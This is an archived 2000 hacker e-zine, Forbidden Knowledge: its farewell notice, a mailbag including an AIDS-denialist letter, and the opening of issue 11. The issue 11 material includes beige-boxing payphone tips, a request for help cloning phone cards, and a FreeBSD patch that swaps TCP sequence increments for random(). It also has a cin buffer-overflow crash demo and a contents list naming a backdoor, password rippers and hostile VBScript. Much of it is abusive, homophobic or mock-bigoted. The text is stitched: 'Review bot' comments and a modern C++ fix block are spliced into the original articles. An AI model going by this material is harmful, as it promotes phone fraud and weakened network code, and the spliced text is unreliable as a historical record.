      +--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+
      (              T  h  e    F  i  n  a  l    C  h  a  p  t  e  r               )
      +--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+
      
      Soundtrack for this Notice: REM - At my most beautiful
      
      The Forbidden Knowledge project, born just over a year and a half ago, has
      drawn to a close. Not because there were any fall-outs among us, or because
      I've lost interest, but simply because better opportunities have come
      along.
      
      Basically, Kokey was pondering reviving his e-zine, but was uncertain of his
      time constraints. I on the other hand was busy with mine, but not getting
      enough support. Our respective problems had a natural solution and that was
      working on a new zine together. (And besides, I can't risk the chance of Kokey
      releasing an e-zine that 0wnz mine unless I'm working on it too. ;P)
      
      So, yes, in some ways FK is dead, and in others, it lives on. I will still be
      working on something and releasing my warped texts on a quasi-regular basis,
      and they will still have that Wizdumb-esque insanity that makes them virtually
      unreadable. But FK as you know it is a thing of the past. And it will be
      sorely missed by me especially.
      
      Special thanks to everyone who has helped out with the zine in any way, whether
      it be feedback or article submissions, or whatever - I love you all. And for
      the record, here are all the people who submitted to FK, in chronological
      order...
      
      Wizdumb
      Pneuma
      Gevil
      Opium
      Brainsaw
      Cyberphreak
      Moe1
      Hitsquad
      Vortexia
      Flashfire
      supo
      Nakamura
      Terabyte
      jus
      Cyberware
      CoLdBLood
      DrSmoke
      Sigma
      MercEnarY
      Virulent
      Jumpers
      DvD
      JungleG
      
      And there you have it ladies and gentlemen. The credits have rolled, the
      lights have come back on, and the few who are still in the room are on their
      way out.
      
      But hey - it's not too long before the first issue of the new, as yet to be
      named zine - which will totally 0wn FK anyway. So be sure to stay tuned to
      http://scene.textfiles.com watching out for it. :)
      
      Sorry that there are no articles in the final installment of FK, they've all
      been hijacked for the new zine. But I feel bad using nothing of the old FK12.
      Hmmm... Okay... Just to have something, I'll tack the mailbag from FK12 onto
      the end of this.
      
      Once again, Thanks for supporting FK
      Wizdumb <wizdumb@leet.org>
      
      -----------------------[ Lame-ass mailbag concatenated for nostalgia's sake
      
      From: 777 <rwx@el8.org>
      To: wizdumb@leet.org
      Date: Wed, 17 May 2000 19:04:38 -0700
      Subject: Congratulations
      
      Congratulations for your excellent article about Chaos Magick in FK #11!
      
      --
      Hail Eris!! All hail Discordia!
      
      [Wizdumb: We're glad you appreciated it - It's quite interesting how many
       chaote hackers there are around. Perhaps it has something to do with a lack
       of respect for rules and boundaries, or an urge to learn without being
       restricted. Or maybe hackers are just smart. :P Thanks for writing.]
      
      -----*****-----******-----
      
      [Wizdumb: Caution, Long Obnoxious Letter follows. Read on at your own risk.]
      
      From: "Drew Hendricks" <drewhendricks@hotmail.com> 
      To: wizdumb@leet.org 
      Date: Thu, 18 May 2000 12:38:02 CDT 
      Subject: http://www.virusmyth.com/aids/index.htm 
      
      RE: Thabo Mbeki's public statement (and letter to Bill Clinton) saying
      that it can't be proved that HIV leads to AIDS - especially
      considering how much goddamn medical experience he has. And let's not
      even *begin* to consider the amount of damage a statement like that
      can cause when almost a *third* of the world is HIV positive. Thabo
      Mbeki, I sincerely hope that you get AIDS and die. I am actually
      *ashamed* to have such a fucking idiot as a president.
      
      OK, two things first:
      
      The man who announced that the virus he later named HIV causes AIDS was
      booted out of the American scientific community when it became obvious
      that he is a lying sack of shit who would sell you a cure for the
      common cold if he could convince you it was eating your momma's face.
      His name is Dr Robert Gallo - you should look him up.
      
      The man who invented the Polymerase Chain Reaction and won the Nobel
      Prize for doing so has personally told me that he has searched in vain
      for ANY paper which even claims to prove HIV causes AIDS and HE CAN'T
      FIND ONE.  His name is Dr Kerry Mullis.  For a Dr, he's a pretty neat
      surfer dude. Look him up, too.
      
      [Wizdumb: Right, I've been reading for two paragraphs and I haven't learnt
       anything - something tells me this is going to be one of *those* letters.]
      
      Additional, if you have not already flamed me out of sheer ignorance:
      
      [Wizdumb: No, wait, I've learnt that this man is a pompous butthead. That's
       something I suppose.]
      
      Just because AIDS is real - and believe me, it is - does not mean that
      the "conventional" wisdom about its origins is true.
      MANY people have tested negative for HIV and died of AIDS.  MANY people
      have tested positive for HIV and never been sick.  Just look at the
      case of a certain famous American basketball star, who has been positive
      for most of a decade...and has yet to be sick.
      
      [ Exiting due to signal SIGSTUPID
        Excessive Stupidity Fault at eip=64756D62 ]
      
      Shit, man - read for yourself and make an informed decision:
      
      http://www.virusmyth.com/aids/index.htm
      
      [Wizdumb: Well, I really hate to have to be the one to tell you this, but I
       guess some-one has to break it to you: The web is the biggest, most
       widely-accessible source of *bullshit* information on this planet - I
       wouldn't touch it with a ten-foot barge-pole, let alone believe anything I
       read on it.]
      
      Better yet, apply a little logic:
      
      The US Military announces in 1970 that it wants "...a synthetic biological
      agent...that does not naturally exist, and for which no natural immunity
      could have been acquired."   "Most important(ly) ... is that it might
      be refractory to the immunological and therapeutic processes upon which we
      depend to maintain our relative freedom from infectious diseases."
      (91st Congress, Appropriations hearings for Dept Defense, 1970 Dr MacArthur)
      >>>He guesses that within 5 to 10 years such an agent would be possible<<<
      >>>That puts it right about 1980....<<<
      
      Next, the "gay plague" occurs in New York and other large American cities
      among sexually active young men, who suddenly have a host of infections
      more common to organ transplant patients whose immune systems have been
      artificially suspended.
      
      Within a few years, a PRESS CONFERENCE announces a new study by Dr Gallo
      which WILL PROVE (when it is published) that a new retro-virus is the
      cause of GRIDS (Gay-Related Immune Deficiency Syndrome).
      
      [Wizdumb: Aaah. I see it now. Let's have promiscuous sex with lots of women
       and shoot all those goddamn disgusting fags. That sounds like a plan.]
      
      The paper is never published in a peer reviewed paper.  A version is
      finally released, but it does not come close to proving the simple
      HIV virus could cause ANY immune suppression, much less the complete
      collapse of the system...it relies instead on a tiny sample of donors
      who have a high co-relation (Many have HIV particles in their blood,
      and also have AIDS.)  No one from a control group is even tested for
      the virus, since the antibody test is not yet perfected and the other
      tests are so expensive.
      
      METAPHOR:
      
      [Wizdumb: Oh dear.]
      
      SO - the military announces it will have a supersonic aircraft:
      The citizens of a town near an airbase hear sonic booms -
      CONCLUSION:  the Air Force probably has supersonic aircraft!
      
      APPLICATION OF METAPHOR:
      
      So- the military announces that it wants an immunity-killer:
      people start dying of AIDS -
      CONCLUSION: maybe they were serious, maybe they did come up with
      something!
      
      [Wizdumb: OMG! That was amazing! Thankyou for your wonderful metaphor to
       explain this to me - I wouldn't have known wtf you were on about otherwise!]
      
      But how do they hide it?
      Any doctor not on their payroll is capable of publishing a report
      of the real pathogen and showing that it is obviously an artificial
      organism with big, fat splices in its DNA...
      
      But let me ask you - who is looking for the cure to polio today?
      
      NO ONE.
      
      [Wizdumb: *GASP* No? ]
      
      After all, we know what causes polio.  There's a vaccine.
      
      [Wizdumb: *Phew* ]
      
      Who would look for the cause of a disease which is already found?
      
      WHERE IS THE HIV VACCINE?
      
      [Wizdumb: *GASP* You HAVE to stop scaring me like this! ]
      
      20 years later, still no vaccine.  Lots of evidence that anti-AIDS
      chemotherapy was deadly during the 1980's and 1990's, but NO VACCINE!
      
      Something does not add up, my friend...your president might not be so
      fucking stupid after all; you did say he has medical experience, right?
      
      [Wizdumb: No, I was employing a device known as sarcasm. You should try to
       start picking it up better if you want to try communicate with your species
       some time.]
      
      HOW MANY HOSPITALS HAVE YOU WORKED IN?
      
      [Wizdumb: None, obviously enough. But my idiocy is only inflicted on a small
       group of depraved hax0rs who never get laid anyway and thus don't need to
       worry. If I were president, I could do a significantly greater amount of
       damage with my opinions. And anyway, is my 0 years experience any less
       relevant than Thabo Mbeki's 0 years experience? No. I didn't think so.]
      
      (And where in the hell did you get the "1/3 of Earth has HIV" shit?
      If anything is proof of what Mbeki says, that would be it...think
      about it!  We would all be dying or know someone personally who is...)
      
      Drew
      
      [Wizdumb: My figures were obviously exaggerated. However, I *DO* personally
       know somebody with AIDS and *two* with HIV. Maybe you don't know anyone with
       AIDS because your only friend is your mom and you spend all your time sending
       long obnoxious e-mails to people who really couldn't care less what the fuck
       you think?]
      
      -----*****-----******-----
      
      From: "David Knapp" <dknapp@calpoly.edu> 
      To: <wizdumb@leet.org> 
      Date: Tue, 16 May 2000 14:06:56 -0700 
      Subject: e-zine question 
      
      Sorry for being a dumb 'merican - but I have a question about the BMW
      unlocking procedure. What is the "boot" on a BMW? I am unfamiliar with
      that term.
      
      ta
      dbk
      
      [Wizdumb: LOL, I wasn't actually aware that this was a South-African-ism.
       Sorry - it's the "trunk" :) Hmmm... I think I could have quite a lot of fun
       if I developed a huge vocabulary of South-African-specific slang, and then
       wrote an article on explosives. :P ]
      
      -----*****-----******-----
      
      From: Frits Haas <Frits.a1@mweb.co.za> 
      To: wizdumb@leet.org 
      Date: Thu, 18 May 2000 05:00:24 -0700 
      Subject: re : fk11 / C/Khaos magick 
      
      greetz ...Rabbit here...
      
      i was quite interested in what u guys had on Chaos magick...although very
      simplified indeed i've been studying Magick for about 6 years now...more Wicca
      than anything else...
      
      [Wizdumb: Captain, my tree-hugging hippy radar is going wild :)]
      
      ....and if u would like me to contribute anything...gimme a shout (but do not
      ..*repeat* do not inform Vortexia...he'll
      
      1) blow a vein in his head
      2) swear for 1/2 an hour without repeating a word
      3) vow to kill me
      4) vow to hax0r me (*try* to anyway - lets not go there)
      5) etc etc ...i'm sure u know the story by now...
      
      [Wizdumb: Not really, but, HEY VORT, Did you hear what this guy said about
       your mom?!! Are you gonna let him get away with that?!@#$%^]
      
      although i do not practise Chaos..(i think it's very dangerous)..i know quite
      alot about it and of ppl that have burnt their hands on it...(it's more
      dangerous than u think...)
      
      [Wizdumb: So I've heard. Personally, I keep my Chaos in the fridge, and then
       only warm it up marginally in the microwave. I've always been one to play
       it safe when it comes to this crazy supernatural stuff. :P]
      
      Wicca on the other hand is (in some ways) similar ..and (in other ways)
      opposite
      
      [Wizdumb: Aaah.]
      
      my personal book of shadows contains about 2900 pages...and i have not yet
      begun to collect other BOS...this is just my own dealings...
      
      [Wizdumb: *My* Book of Shadows is 0 pages, I have not yet begun to collect
       my work - this is only what my cat has done.]
      
      anyway...
      
      kewl zine dude...keep up the l33t work
      
      [Wizdumb: Glad ya like it. Keep reading, when the new zine comes out, bro. :)]
      
      regards,
      Rabbit
      aka Frits
      
      bright blessings and merry part
      
      -----*****-----******-----
      
      From: "k-rad-bob" <k-rad-bob@b0g.org>
      To: <wizdumb@leet.org>
      Subject: h0h0!
      Date: Sun, 21 May 2000 23:45:47 +0200
      
      reading fk11 almost made me ejaculate in my pants (i read it at work of
      course) and i simply had to email you guys.
      
      [Wizdumb: Are you implying that you don't wear pants when not at work?]
      
      b0g loves you!!!!!
      
      [Wizdumb: We love b0g!!!! :)]
      
      since you guys are so lovable i'll add fk to the zines section (when im
      bothered that is, im pretty lazy/buzy these days) til then, have fun and
      strangle a Turk!
      
      oh, and by the way: FUCK OFF!#@!
      
      yours in cyberspace
      
      k-rad-bob
      
      [Wizdumb: Fuq j0o!@#$ We officialy return j0r wage of war, and are giving full
       priority to the destruction of b0g. Not only will we 0wn b0g.org, but we will
       0wn b0g.org. Furthermore, we will 0wn b0g.org. We have also started a b0g
       mirror at www.mdma.za.net/b0g solely to deface it at a later date - 0h0h0h0]
      
      -----*****-----******-----
      
      Date: Tue, 23 May 2000 16:06:14 -0700 (PDT)
      From: Richie Hasting <naz-t1@excite.com>
      To: wizdumb@leet.org
      Subject: greets Wyzewun fellow telkom h8terz
      X-Mailer: Excite Inbox
      X-Sender-Ip: 196.22.171.126
      
      Hiya greets form a phreaker,hacker in ZA your info is hardcored but I have
      even more 2 add like how 2 remoteley controll a ISP's pop servers power
      remoteley as well as how to phreak fone linez of people living in flats, and
      how 2 cover ones tracks. I ALSO HAVE KNOWLEDGE IN THE CELLULAR INDUSTRY
      USING SOCIAL ENGENEERING SKILLZ TO GET WHAT I want.
      
      [Wizdumb: OMG! This is my favourite type of e-mail! The type where you just
       sit and wonder what the FUCK the dildo on the other side is trying to get
       across to you. Sometimes, late at night, you can read over them and they
       almost make sense - granted that you've had a good few shots of vodka prior
       to reading that is. Regardless, these rock - send more please.]
      
      I am currently in the process of cloning telephone cards but only one
      problem I NEED @ OBTAIN A TELKOM GREEN PHONE card machine as i NEED THE
      READER, have u any ideas 2 break the green bastard open and get the insides
      (die binne goed) out....
      
      [Wizdumb: Okay, I have now established that the writer is Afrikaans, so should
       I forgive him for not being able to speak English? Hmmm... Naah, if his
       English sucks this much then he should've written to me in Afrikaans for
       crying out loud.]
      
      Pls email me to get more info outa me, if u don't email me I'll think I am
      not 3l33t3 enuff.
      
      [Wizdumb: Guess yer not "3l33t3" enuff, eh?]
      
      Regards 
      Naz-t1 also known as naz-1
      
      eail me...
      
      Cheerz
      
      [Wizdumb: *Sigh* I hate this job... When is that transfer coming through?]
      
      
      
      NO CARRIER
      
      @HWA
      
      As a sort of homage, here is issue #11, the final release of FK for the
      archives. - Ed
      
      ===---===---===---===---===---===---===---===---===---===---===---===---===---

                                  :    ____
                                i..?W$$$$$$$          __                           
                               ;Q$$P"    $$$        ;$$$                           
                             .$$$;'      $$$        I$$$                           
                            I$$. :       $$$        $$$;                           
                           ;$I?  .       $$$    _..$$$;                            
                           $$$;          $$$y#Q$$$$$P'                             
                           $$$           $$$P""^^                                  
                      _____$$$           $$$;                                      
                      $$$$$$$$$$$$$$     `$$$y,                                    
                      ''^""$$$^^""""     ;,"?$$$#,                                 
                           $$$           I$#  ^$$$$,                               
                           $$y,          $$$    ?$$$;                              
                           $$$;          $$$    ;$$$I                              
                              :          $$$     $$$$                              
                              .                  $$$$                              

          Forbidden Knowledge Issue Eleven: Released 16th May 2000AD
        Leet0 Wizdumb's 17th Birfday Ish!@#$% Happy Birfday to Me!@#$%^

      ---===---===---===---===---===---===---===---===---===---===---===---===---===
      
                                        Shout Outz
                                        +-======-+
      MDMA, Sigma, DrSmoke, TimeWiz, meiso, Coldblood, Rawhed, JungleG, RIFT, {},
      Slash, b0f, Most of the hoez from Blabber.Net's #hack (Aragon, Opium, acid,
      xanex, et al), Pushers who give LSD to Five Year Olds, Cruciphux, Gevil,
      All the blasphemers from article 0x45, Catholic School Girls that give good
      head
      
                                         Fuck Youz
                                         +-=====-+
      Catholic School Girls that DON'T, People who can't see the humour in the abuse
      of homeless people, Homeless People, All the hoez in the acne remedy
      commercials with no acne, *!*@dal.net, *!*@under.net, People who wait until
      the *END* of the answering machine message before they hang up, Defacers,
      People who think defacers have skillz, People who write e-zines, People who
      think people who write e-zines have skillz, Loud Annoying Evangelical
      Churches, kppp users, Broccoli
      
      
      Movies of the Month: American Beauty
                           South Park - Bigger, Longer and Uncut
      
      Sites of the Month: Info Regarding Egodeath                   hv2k.voltage.org
                          My Personal FK Mirror                   www.mdma.za.net/fk
                          H/P E-Zine Community                   scene.textfiles.com
      
      Narq of the Month: MostHateD (Congradulations!@#$%^&)
      
      Windoze 9x command of da month: copy /Y c:\windows\logos.sys c:\logo.sys
      
      Short Story of the Month: "The Doom that came to Sarnath" by HP Lovecraft
      
      Fun: Walking out the plane in Zimbabwe's airport wearing a T-Shirt that says
           "Whites rule. The Zimbabwean government is hiding the aliens from us.
           Gay Rights now."
      
      Official FK11 Soundtrack: KoRn, Limp Bizkit, Rage Against the Machine, Bush,
                                Eminem, Red Hot Chilli Peppers, Rammstein, Pixies,
                                Springbok Nude Girls, Radiohead, Bloodhound Gang,
                                Our Lady Peace, Cypress Hill, Blink182, Orgy
      
      Scary: Seeing an automatically flushing urinal for the first time ever just
             after eating Psilocybe Mushrooms
      
      Oh: If you have copies of Forbidden Knowledge printed out and lying in your
          office's waiting room like we have heard several people have - PLEASE
          PLEASE PLEASE take a photo of them and your waiting room, scan them in,
          and e-mail them to wizdumb@leet.org ;-) Don't have a scanner? E-mail us
          for a snail mail addy, but just GET US THOSE PICTURES. =)
      
      Amusing: Thabo Mbeki's public statement (and letter to Bill Clinton) saying
               that it can't be proved that HIV leads to AIDS - especially
               considering how much goddamn medical experience he has. And lets not
               even *begin* to consider the amount of damage a statement like that
               can cause when almost a *third* of the world is HIV positive. Thabo
               Mbeki, I sincerely hope that you get AIDS and die. I am actually
               *ashamed* to have such a fucking idiot as a president.
      
           ________,,,...........                 .........______
      $$$$$$$$$^^^^^                                      '''''"""???zz.   $$
         ^?$$$                                                                `?; $$
           '$$         Contents of Forbidden Knowledge Issue 11                $;$$$
            ?;                                                              ,,?;I$$$
           ,"________________________________________________________..,,##',  $$
        _.+                                                                     +.,;
      
      
              0x90> Credits
              0x90> Editorial
              0x90> Mail from the Readers
      
              Articlez...
      
              0x30> Byteware of the Month                          [Wyze1, Jus, DvD]
              0x31> Unlocking Cellphones without the Mastercode               [Moe1]
              0x32> Hacking Reality: An Introduction to Khaos Magick       [Wyzewun]
      REM     0x33> Details of Microsoft's Space Exploration Plan           [Pneuma]
              0x34> K-Rad Oh-Day Christianity Warez                        [Various]
              0x35> Cisco PIX (and others) Denial of Service Attack       [Vortexia]
              0x36> An Introduction to Java Servlets                       [Wyzewun]
              0x37> Fixing M-Web Specific Modems                           [JungleG]
              0x38> Miscellaneous IRC Gayness                              [Various]
      
              Other junk...
      
              0x41> The Mysterious blommetjies.jpg (Zoom In :P)            [Wyzewun]
              0x42> Completely Useless killmod.php3 Warez                  [Wyzewun]
              0x43> Internet Explorer 4/5 Hostile VBScript                 [Wyzewun]
              0x44> Share Password Extractor Version 2                       [Sigma]
              0x45> Microsoft Access 97 Database Password Remover          [Wyzewun]
              0x46> Lame Ass Win9x/NT4 Backdoor                            [Wyzewun]
              0x47> Windoze Dialup Account Login Ripper                      [Sigma]
              0x48> B0nus Super-el8 Esteban Warez                          [Various]
              0x49> MDMA Advisories #2 through to #4                       [Wyzewun]
              0x50> Various Stupid-ass DoS vulnerabilties                  [Wyzewun]
      
              0x90> Outro
      ,?'
      $$;
      $$$QQQ####,,,,________________________________           _________    ______ _
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                  People who made this Issue possible           ._ ,;:;,, _.
      
      The Usual Bitchez who contributed...
      -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
      Wyzewun
      Pneuma
      Vortexia
      Moe1
      Jus
      
      Special Thanx to Deeze Guest Bitchez...
      -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
      JungleG
      Sigma
      DvD
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      ^^^^^^^^^""""""
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                          Editorial by Wizdumb                  ._ ,;:;,, _.
      
      So last week me and my bitchez...
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                           Mail from The Readers                ._ ,;:;,, _.
      
      Date: Tue, 4 Apr 2000 08:43:39 -0500 (CDT)
      From: Al Mccain <reswh0re@conspire.arcsnet.net>
      To: wizdumb@leet.org
      Subject: got a question about someone..
      Message-ID: <Pine.LNX.4.05.10004040842370.17988-100000@conspire.arcsnet.net>
      MIME-Version: 1.0
      Content-Type: TEXT/PLAIN; charset=US-ASCII
      
      sigma, where is he from?
      think i know him, just not sure.
      
      [Ed: I replied with "Huh? Who are you?" and I kinda never heard from him
           again, HEH! ;-P Still - mail like this worries me.]
      
      ------
      
      [Ed: I posted something to scene.textfiles.com to the effect of "Forbidden
           Knowledge Issue One to Ten released, but we were too dumb to notice"
           and got the following reply...]
      
      X-Authentication-Warning: lala.navpoint.com: mogel owned process doing -bs
      Date: Fri, 7 Apr 2000 15:55:38 -0500 (EST)
      From: mogel <mogel@hoe.nu>
      X-Sender: mogel@lala.navpoint.com
      To: Wyzewun <wizdumb@leet.org>
      Subject: FK and scene.textfiles.com
      In-Reply-To: <200004071104.EAA31560@nak.dreamhost.com>
      Message-ID: <Pine.LNX.4.10.10004071554090.670-100000@lala.navpoint.com>
      MIME-Version: 1.0
      Content-Type: TEXT/PLAIN; charset=US-ASCII
      
              I'm glad you wrote me, I tried to contact you like two months ago,
      but those addresses bounced back.  I added you folks to the site... feel
      free to shoot me an email whenever you guys release, and I'll announce it
      on my site.  You might consider making a mailing list to announce
      whenever there's a release to readers, or something.  Keep in touch.
      
      -Mogel
      
      [Ed: More about this at the end of the zine]
      
      ;,                                                                       ,;;4,
      ,?;;$;,__________________________________________________________________,,7$;
      
      
           __... .                                                   . ...__
        d$$^^                                                             ^^$$b
      .?$;                                                                   ;$$;:;,
      _.                               Byteware                         ._ ,;:;,, _.
      
      Byteware from Wyzewun...
      
      When beigeboxing a South African cardphone, you are interested in one of the
      white wires and the blue wire, okay?
      
      ------
      
      Telkom's new boxes look like this...
                        ___________
                       /    ()     \
                       -------------
                       | ___       |
                       | \  \      |
                       |  \__\     |
                       |   OOO     |
                       |    OOO    |
                       |     OOO   |
                       |           |
                       |           |
             ,,,,,,,,,,|___________|,,,,,,,,,,
      
      Okay, so my ascii art sucks (I guess I shoulda gotten Cyberphreak to draw
      this) but what the fuck. Regardless, they're tall and thin, and are opened at
      the top using the little hole which I pathetically tried to depict. ;-P It
      appears that these boxes are Telkom's new preferred system, and they are worth
      finding ways to break into (That preferably don't involve kicking the whole
      thing to pieces) - and if you succeed in breaking into one - write us an
      article on it!@#$% :-)
      
      ------
      
      No-one sends fuck you'z to the FK editorial staff in their e-zines! We feel
      unimportant! Pleeze Pleeze Pleeeeze - you're not hardk0re if you don't have
      an el8 rival zine that hates you! :-(
      
      Actually, I have a feeling this approach isn't going to work. Hmm... Plan B...
      
      Phrack  :       FUCK YOU!@#$%^&
      BoW     :       FUCK YOU!@$%&^&*
      f41th   :       FUCK YOU!@#$%
      FK      :       FUCK YOU!#$#%^... No... Wait a Minute...
      b0g     :       FUCK YOU!#@$^&*
      b4b0    :       FUCK YOU!@#$%&*
      ch4x    :       FUCK YOU!@$#%&(
      ~el8    :       FUCK YOU!$#$^*(%
      HWA.HN  :       FUCK YOU!@##$%^$&
      NoU     :       TAKE 0FF J0R CL0THEZ!#@%%$&&*
      
      ------
      
      Here's an *EXTREMELY* simple little patch for tcp_seq.h I wrote for
      FreeBSD (tested on 3.4-RELEASE, but should work on 2.2 - 4.0) to increase
      security and to stop nmap from recognizing the OS (which is the real
      reason I wrote it, the extra security offered is not really necessary :P).
      This just shows you how simply a TCP/IP fingerprint can be spoofed...
      
      Once extracted just run patch tcp_seq.h diff.file in /sys/netinet
      
      --- cut diff file here ---
      96c96
      < #define       TCP_ISSINCR     (122*1024 + tcp_random18())
      ---
      > #define       TCP_ISSINCR     (random())
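Review bot: line 96 replaces a bounded increment (122*1024 plus tcp_random18()) with a bare random(), so the step no longer has a guaranteed minimum or a documented upper bound, and nothing here says how random() is seeded or whether a remote observer can predict it. Consider keeping the fixed base and widening only the random term, and add a comment stating the intended range, since the stated purpose of the patch is to change what a scanner sees in the sequence numbers.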
      100c100
      < #define       TCP_ISSINCR     (250*1024)      /* increment for tcp_iss each second */
      ---
      > #define       TCP_ISSINCR     (random())      /* increment for tcp_iss each second */
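Review bot: the retained comment on line 100, "increment for tcp_iss each second", no longer describes the value, which is now whatever random() returns on each expansion rather than a fixed per-second step of 250*1024. Update the comment to match, and note that this definition and the one at line 96 define the same macro (presumably in alternate preprocessor branches), so after this patch the choice between them makes no difference; either say so or collapse them into one definition.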
      --- cut diff file here ---
      
      ------
      
      Looking through the logs on Pneuma's box I found this...
      
      <snip>
      <Gentoo> Well, the buffer overflow examples are a little lame ... but, it
      actually seems okay at second glance.
      <Pneuma> hehhehehehe, it usually is, it grows on you
      <Gentoo> THough, I could see why you might have to try so hard -- it's on
      Windoze ......
      <Pneuma> whats on windows?
      <Gentoo> The buffer overflow program example.
      <Pneuma> heh, its aimed at newbies and compiles under *nix neway :P
      <Gentoo> Well, it's also C++ ... cin >> of course checks for buffer overflows.
      </snip>
      
      *Sigh* I hate it when idiots try and make it look like *I'm* wrong...
      
      C:\temp>type gay.cpp
      
      #include <iostream.h>
      
      void main() {
        char beer[5];
        cin >> beer; }
      
      C:\temp>cl gay.cpp
      Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
      Copyright (C) Microsoft Corp 1984-1998. All rights reserved.
      
      gay.cpp
      Microsoft (R) Incremental Linker Version 6.00.8168
      Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
      
      /out:gay.exe
      gay.obj
      
      C:\temp>gay
      AAAAAAAAAAAAAAA
      
      GAY caused an invalid page fault in
      module <unknown> at 00de:00414141.
      Registers:
      EAX=004089a0 CS=015f EIP=00414141 EFLGS=00010246
      EBX=00530000 SS=0167 ESP=0063fe00 EBP=41414141
      ECX=0000000a DS=0167 ESI=8162c000 FS=1a8f
      EDX=0076066f ES=0167 EDI=00000000 GS=0000
      
      Gosh, EIP and EBP look a bit weird. *Sigh* Just because texts up to now have
      not mentioned buffer overflow related problems with cin and ifstream doesn't
      mean they don't exist.
      
      In fact, I am willing to *bet* that the buffer overflows in WinAMP's reading
      of playlists and Netscape Navigator's reading of prefs.js were both caused by
      improper use of an ifstream. This is also a huge problem because *every* C++
      course/tutorial tells programmers to use their ifstreams like that.
      Anyway, the real moral of the story - Fuck off and check your facts
      before you whine. ;-P
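
The fix for the `cin >> beer` overflow shown above, as an added example that is not part of the original zine: three bounded ways to read the same input in C++. The function names, the reuse of the article's 5-byte buffer, and the sample input are assumptions constructed for illustration.

```cpp
#include <cctype>
#include <cstddef>
#include <cstring>
#include <iomanip>
#include <iostream>
#include <limits>
#include <sstream>
#include <string>

// Constructed sample input: the 15-byte token typed in the session above.
static const char kSampleInput[] = "AAAAAAAAAAAAAAA\n";

// The article's pattern, for reference only (not compiled here):
//     char beer[5];
//     cin >> beer;      // no bound before C++20: 16 bytes written into 5

struct ReadResult {
    std::string text;   // what was stored
    bool truncated;     // true if the token continued past the buffer
};

// Fix 1: keep the fixed buffer, bound the extraction with setw().
// operator>> stores at most width-1 characters plus the NUL, then resets the
// width to 0, so setw() has to precede every single read into a char buffer.
ReadResult read_token_bounded(std::istream& in) {
    char buf[5] = {0};
    in >> std::setw(static_cast<int>(sizeof buf)) >> buf;
    // The rest of an over-long token stays in the stream; detect it rather
    // than letting the next read silently pick up the leftovers.
    int next = in.peek();
    bool more = next != std::char_traits<char>::eof() &&
                !std::isspace(static_cast<unsigned char>(next));
    return ReadResult{std::string(buf), more};
}

// Fix 2: line-oriented read. istream::getline() sets failbit when the line
// does not fit; reject the line and discard the remainder of it.
bool read_line_strict(std::istream& in, char (&buf)[5]) {
    if (in.getline(buf, sizeof buf)) return true;
    buf[0] = '\0';
    if (!in.eof()) {
        in.clear();
        in.ignore(std::numeric_limits<std::streamsize>::max(), '\n');
    }
    return false;
}

// Fix 3: std::string grows as needed, so there is no fixed buffer to smash.
// setw() still caps how much is read, which lets over-long input be rejected
// without buffering all of it.
bool read_token_string(std::istream& in, std::string& out, std::size_t max_len) {
    in >> std::setw(static_cast<int>(max_len + 1)) >> out;
    if (!in || out.size() > max_len) {
        out.clear();
        return false;
    }
    return true;
}

int main() {
    std::istringstream a(kSampleInput);
    ReadResult r = read_token_bounded(a);
    std::cout << "setw:    \"" << r.text << "\" truncated=" << r.truncated << "\n";

    std::istringstream b(kSampleInput);
    char line[5];
    std::cout << "getline: accepted=" << read_line_strict(b, line) << "\n";

    std::istringstream c(kSampleInput);
    std::string s;
    std::cout << "string:  accepted=" << read_token_string(c, s, 4) << "\n";
    return 0;
}
```

C++20 replaced the `char*` overload of `operator>>` with an array-reference overload that bounds the read by the array size, but code built against older standards keeps the behaviour shown in the article.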
      
      ------
      
      Some extracts from a recent e-mail to me from okby@b4b0.org which may be of
      interest to some hoez...
      
      <snip>
      Indeed we are still putting out the ezine. Sorry, but we've been off for
      awhile, mainly due to real life problems in everyones schedule. Real life
      comes before internet. Anyhow, we're back in business, and we're stronger than
      ever.
      </snip>
      
      <snip>
      (ps. if you have anybody else you know that would be interested in submitting
      anything to the ezine please let them know that we'll look at anything
      especially if it has something about social antics or programming in it.
      thnx.)
      </snip>
      
      ------
      
      Pneuma and I have decided to choose some completely arbitrary race to hate with
      a passion. We looked in an Atlas and found Andorra, a tiny little country
      between France and Spain with a population of about 2000, and decided that it
      would do well. Before we were completely unaware of the great threat of this
      nation, and now we have made the shocking discovery that They're everywhere!
      They're taking all our jobs! They're corrupting our way of life!
      
      First of all - you must know how to identify Andorrans so as to be able to
      persecute them at every possible moment. We have decided that they all,
      without doubt, have hair growing out their ears. You can also always tell an
      Andorran by their nose. We don't know exactly what *about* it, but we are sure
      this identification technique is also completely infallible.
      
      And boy oh boy, when an Andorran moves into your neighbourhood - you'll know
      about it! Your children will worship Satan, take drugs, and eat... starchy
      stuff! Things will go missing everywhere (The Andorrans are *born* thieves,
      they even steal their currency from France and Spain!) And we're not even
      going to *begin* talking about their SMELL!
      
      So - join the fight against Andorra before it's too late! Besides - it's fun
      saying "Oh yeah, well at least (X Racial Group) aren't as bad as the fucking
      ANDORRANS!" and everyone always assumes that comments about Andorrans relate
      to *their* racial group - whatever that may be.
      
      Oh, and if you live in Andorra, please, please, e-mail us. ;-P
      
      ------
      
      Interesting fact of the month, as found in issue four of b0g... <www.b0g.org>
      
      <snip>
      LONGEST PUBES
      Maoni Vi of Cape Town has hair measuring 32 inches from the armpits and 28
      inches from her minge.
      </snip>
      
      Yeah! Gov-Boi's home town! Coincidence? I think not. ;-) Shjeesh, and ppl
      wonder why I keep on ripping off CT. :-P
      
      ------
      
      Real-life quote of the month...
      
      <Pneumas_Mom> Marcel, it says in this magazine that men like being anally
       fingered during sex. How should I approach Steve about this?
      
      ------
      
      Don't want your Java to run on Microsoft VM's? Then instead of using this...
      
        public static void main(String[] args) {
      
      Use THIS...
      
